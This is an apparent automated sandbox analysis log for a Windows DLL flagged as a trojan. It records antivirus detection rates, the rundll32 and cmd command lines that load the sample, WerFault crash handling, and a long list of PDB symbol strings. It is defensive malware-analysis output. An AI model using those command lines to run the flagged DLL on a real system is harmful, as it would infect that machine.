Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: mscms.pdb>t< source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: WerFault.exe, 00000009.00000002.301167220.00000000051D3000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300504231.0000000004A8D000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.317002782.0000000004B47000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 0000000A.00000002.301075274.0000000004B73000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemetry.mSg
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, RELOCS_STRIPPED
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllVirustotal: Detection: 62%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllMetadefender: Detection: 29%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllReversingLabs: Detection: 75%
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoed
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll'
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoed
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 804
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',uvlcopdlxoed
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 804
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoedJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',uvlcopdlxoedJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2564
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2036
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1752
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E8A.tmpJump to behavior
Source: classification engineClassification label: mal56.winDLL@12/12@0/1
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: SecuriteInfo.com.Trojan.Agent.FHBA.20741.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: msacm32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msvfw32.pdbL source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: msvfw32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb7 source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.250625291.00000000052FD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250652039.0000000000C54000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.260648787.0000000004C2B000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdbCa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: avicap32.pdbF source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.251728422.0000000000C4E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.263422997.0000000000B8E000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb/ source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: winmm.pdbpt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: msacm32.pdb% source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbht source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: mscms.pdbT source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb8 source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdbXt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250660218.0000000000C5A000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.262553693.0000000000B9A000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb- source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb8 source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: ODBC32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdbbt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb[ source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdbQa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbua source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbb source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: avifil32.pdb8t6 source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb> source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: mpr.pdbZ source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: rtm.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: sfc.pdbY source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbY source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbu source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.251452448.0000000003516000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250652039.0000000000C54000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.260239602.0000000000B94000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb$t: source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: dpapi.pdbnt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb" source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: avifil32.pdb@ source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdby source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb' source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb|t source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: avifil32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbIa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb; source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbk source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.251871969.0000000003510000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.251728422.0000000000C4E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.263422997.0000000000B8E000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdby source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb]a source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb2t( source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: winmm.pdbm source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb! source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: combase.pdbWa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb4 source: WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbZ source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: userenv.pdbvt source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
